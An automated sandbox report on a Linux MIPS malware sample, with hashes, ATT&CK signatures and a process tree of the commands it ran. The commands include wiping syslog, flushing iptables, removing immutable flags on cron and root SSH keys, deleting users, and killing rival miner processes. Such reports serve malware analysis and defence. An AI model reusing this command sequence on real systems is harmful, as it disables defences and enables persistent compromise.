7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b

Analysis

max time kernel
150s
max time network
19s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20-09-2024 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
Size

30KB
MD5

eccba1bd0adedf00340c53fd34e800d7
SHA1

7b959de9d793bbc071dad336fd2e4d4cb82c7b0f
SHA256

7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b
SHA512

116ca660e158a83ae12222aae2b440586604e51e58630a4f12118e1fae760a403d9bf00d7f79e4aad252d268736d699739d4665ee27b4f952a2660fd9c42f508
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKU:p78zQ5VFNcDAFLcIwgnoYq0xFBVdHtrn

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

Processes:

iptables

pid	Process
710	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
715	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargschattrchattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsgrepxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	Process
1317	xargs
1439	xargs
1003	xargs
1238	xargs
786	xargs
1166	xargs
1156	xargs
1343	xargs
1542	xargs
706	chattr
735	chattr
1080	xargs
1231	xargs
1278	xargs
1566	xargs
881	xargs
955	xargs
984	xargs
1010	xargs
1095	xargs
1381	xargs
792	xargs
841	xargs
1195	xargs
1311	xargs
1489	xargs
853	xargs
940	xargs
1124	xargs
1414	xargs
1297	xargs
1429	xargs
1572	xargs
1048	xargs
1186	xargs
1323	xargs
1398	xargs
1560	xargs
736	chattr
1181	xargs
823	xargs
1129	xargs
1369	xargs
1419	xargs
1495	xargs
748	grep
798	xargs
835	xargs
855	xargs
904	xargs
1161	xargs
1259	xargs
1518	xargs
760	xargs
811	xargs
1116	xargs
1200	xargs
1041	xargs
1088	xargs
1434	xargs
1444	xargs
864	xargs
1022	xargs
1424	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsexim4pspspspssysctl

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	Process
1226	ps
1567	ps
1018	ps
1076	ps
1300	ps
1555	ps
958	ps
1091	ps
1281	ps
1313	ps
1352	ps
742	ps
1455	ps
1484	ps
1525	ps
993	ps
1070	ps
1246	ps
1262	ps
1519	ps
965	ps
1307	ps
1006	ps
1187	ps
1293	ps
1253	ps
1326	ps
1478	ps
921	ps
1339	ps
1460	ps
1496	ps
1513	ps
1508	ps
1177	ps
1377	ps
1440	ps
1490	ps
1549	ps
916	ps
931	ps
1345	ps
1157	ps
1084	ps
1382	ps
1120	ps
941	ps
999	ps
1287	ps
1450	ps
987	ps
1182	ps
1268	ps
1405	ps
1044	ps
1056	ps
1206	ps
1435	ps
1543	ps
1393	ps
1430	ps
1472	ps
747	ps
1100	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/5/status	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/465/stat	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/339/status	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/339/status	ps
File opened for reading	/proc/385/stat	ps
File opened for reading	/proc/693/cmdline	ps
File opened for reading	/proc/143/status	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/6/status	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/114/stat	ps
File opened for reading	/proc/375/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/376/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/245/stat	ps
File opened for reading	/proc/512/status	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/693/status	ps
File opened for reading	/proc/695/status	ps
File opened for reading	/proc/694/stat	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/375/status	ps
File opened for reading	/proc/104/cmdline	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/339/status	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/385/cmdline	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/164/stat	ps
File opened for reading	/proc/689/cmdline	ps
File opened for reading	/proc/376/cmdline	ps
File opened for reading	/proc/1241/status	ps
File opened for reading	/proc/148/status	ps
File opened for reading	/proc/78/stat	ps
File opened for reading	/proc/1480/stat	ps
File opened for reading	/proc/375/status	ps
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/700/status	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/1203/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/695/status	ps

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

grepgrepgrep

pid	Process
1189	grep
1432	grep
1159	grep

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/log_rot	eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118

/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:696
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:698
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:699
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:704
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:706
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:708
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:710
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:715
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:724
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1srSrI-0000Bg-TN
      4⤵
      Reads CPU attributes
      PID:773
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:727
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1srSrD-0000Bj-3L
      4⤵
      PID:741
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    - Reads CPU attributes
    PID:730
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:732
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:733
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:735
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:736
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:738
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:739
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:740
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:742
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:743
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:748
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:747
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:751
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:752
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:753
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:754
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:759
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:758
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:757
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:760
- /bin/grep
  grep :143
  2⤵
  PID:762
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:764
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:763
- /bin/grep
  grep -v -
  2⤵
  PID:765
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:766
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:770
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:769
- /bin/grep
  grep :2222
  2⤵
  PID:768
- /bin/grep
  grep -v -
  2⤵
  PID:771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:772
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:777
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:776
- /bin/grep
  grep :3333
  2⤵
  PID:775
- /bin/grep
  grep -v -
  2⤵
  PID:778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:779
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:784
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:783
- /bin/grep
  grep :3389
  2⤵
  PID:782
- /bin/grep
  grep -v -
  2⤵
  PID:785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:786
- /bin/grep
  grep :4444
  2⤵
  PID:788
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:789
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:790
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:792
- /bin/grep
  grep -v -
  2⤵
  PID:791
- /bin/grep
  grep :5555
  2⤵
  PID:794
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:795
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:798
- /bin/grep
  grep -v -
  2⤵
  PID:797
- /bin/grep
  grep :6666
  2⤵
  PID:800
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:801
- /bin/grep
  grep -v -
  2⤵
  PID:803
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:804
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:802
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:808
- /bin/grep
  grep :6665
  2⤵
  PID:807
- /bin/grep
  grep -v -
  2⤵
  PID:810
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:809
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:811
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:814
- /bin/grep
  grep :6667
  2⤵
  PID:813
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:815
- /bin/grep
  grep -v -
  2⤵
  PID:816
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:817
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:821
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:820
- /bin/grep
  grep :7777
  2⤵
  PID:819
- /bin/grep
  grep -v -
  2⤵
  PID:822
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:823
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:826
- /bin/grep
  grep :8444
  2⤵
  PID:825
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:827
- /bin/grep
  grep -v -
  2⤵
  PID:828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:829
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:832
- /bin/grep
  grep :3347
  2⤵
  PID:831
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:833
- /bin/grep
  grep -v -
  2⤵
  PID:834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:835
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:839
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:838
- /bin/grep
  grep :14444
  2⤵
  PID:837
- /bin/grep
  grep -v -
  2⤵
  PID:840
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:841
- /bin/grep
  grep :14433
  2⤵
  PID:843
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:844
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:845
- /bin/grep
  grep -v -
  2⤵
  PID:846
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:847
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:851
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:850
- /bin/grep
  grep :13531
  2⤵
  PID:849
- /bin/grep
  grep -v -
  2⤵
  PID:852
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:853
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:855
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:854
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:857
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:856
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:858
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:859
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:864
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:863
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:866
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:865
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:868
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:867
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  PID:869
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  PID:870
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  PID:871
- /bin/grep
  grep -v grep
  2⤵
  PID:874
- /bin/grep
  grep ./oka
  2⤵
  PID:873
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:875
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:876
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:872
- /bin/grep
  grep -v grep
  2⤵
  PID:879
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:878
- /bin/ps
  ps aux
  2⤵
  PID:877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:880
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:881
- /bin/grep
  grep -v bin
  2⤵
  PID:884
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:883
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:882
- /bin/grep
  grep -v "\\["
  2⤵
  PID:885
- /bin/grep
  grep -v "("
  2⤵
  PID:886
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:887
- /bin/grep
  grep -v proxymap
  2⤵
  PID:888
- /bin/grep
  grep -v postgres
  2⤵
  PID:889
- /bin/grep
  grep -v postgrey
  2⤵
  PID:890
- /bin/grep
  grep -v kinsing
  2⤵
  PID:891
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:892
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:893
- /bin/grep
  grep -v "\\["
  2⤵
  PID:897
- /bin/grep
  grep -v bin
  2⤵
  PID:896
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:895
- /bin/grep
  grep -v "("
  2⤵
  PID:898
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:894
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:899
- /bin/grep
  grep -v proxymap
  2⤵
  PID:900
- /bin/grep
  grep -v postgres
  2⤵
  PID:901
- /bin/grep
  grep -v postgrey
  2⤵
  PID:902
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:904
- /bin/grep
  grep -v "\\["
  2⤵
  PID:908
- /bin/grep
  grep -v bin
  2⤵
  PID:907
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:906
- /bin/grep
  grep -v "("
  2⤵
  PID:909
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:910
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  PID:905
- /bin/grep
  grep -v proxymap
  2⤵
  PID:911
- /bin/grep
  grep -v postgres
  2⤵
  PID:912
- /bin/grep
  grep -v postgrey
  2⤵
  PID:913
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:914
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:915
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:919
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:918
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:920
- /bin/grep
  grep -v grep
  2⤵
  PID:917
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:916
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:924
- /bin/grep
  grep -v grep
  2⤵
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:925
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:922
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:921
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:929
- /bin/grep
  grep -v grep
  2⤵
  PID:928
- /bin/grep
  grep ./crun
  2⤵
  PID:927
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:930
- /bin/ps
  ps aux
  2⤵
  PID:926
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:934
- /bin/grep
  grep -v grep
  2⤵
  PID:933
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:932
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:935
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:931
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:939
- /bin/grep
  grep :3333
  2⤵
  PID:938
- /bin/grep
  grep -v grep
  2⤵
  PID:937
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:940
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:936
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:944
- /bin/grep
  grep :5555
  2⤵
  PID:943
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:945
- /bin/grep
  grep -v grep
  2⤵
  PID:942
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:941
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:949
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:948
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:950
- /bin/grep
  grep -v grep
  2⤵
  PID:947
- /bin/ps
  ps aux
  2⤵
  PID:946
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:954
- /bin/grep
  grep log_
  2⤵
  PID:953
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:955
- /bin/grep
  grep -v grep
  2⤵
  PID:952
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:951
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:961
- /bin/grep
  grep systemten
  2⤵
  PID:960
- /bin/grep
  grep -v grep
  2⤵
  PID:959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:962
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:958
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:968
- /bin/grep
  grep netns
  2⤵
  PID:967
- /bin/grep
  grep -v grep
  2⤵
  PID:966
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:969
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    PID:972
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    PID:972
- - /usr/sbin/kill
    kill -9 10
    3⤵
    PID:972
- - /usr/bin/kill
    kill -9 10
    3⤵
    PID:972
- - /sbin/kill
    kill -9 10
    3⤵
    PID:972
- - /bin/kill
    kill -9 10
    3⤵
    PID:972
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:965
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:976
- /bin/grep
  grep voltuned
  2⤵
  PID:975
- /bin/grep
  grep -v grep
  2⤵
  PID:974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:977
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:973
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:983
- /bin/grep
  grep darwin
  2⤵
  PID:982
- /bin/grep
  grep -v grep
  2⤵
  PID:981
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:984
- /bin/ps
  ps aux
  2⤵
  PID:980
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:990
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:989
- /bin/grep
  grep -v grep
  2⤵
  PID:988
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:991
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:997
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:996
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:995
- /bin/grep
  grep -v grep
  2⤵
  PID:994
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:993
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1002
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1001
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1003
- /bin/grep
  grep -v grep
  2⤵
  PID:1000
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:999
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1009
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1008
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1010
- /bin/grep
  grep -v grep
  2⤵
  PID:1007
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1006
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1015
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1014
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1016
- /bin/grep
  grep -v grep
  2⤵
  PID:1013
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1012
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1021
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1020
- /bin/grep
  grep -v grep
  2⤵
  PID:1019
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1022
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
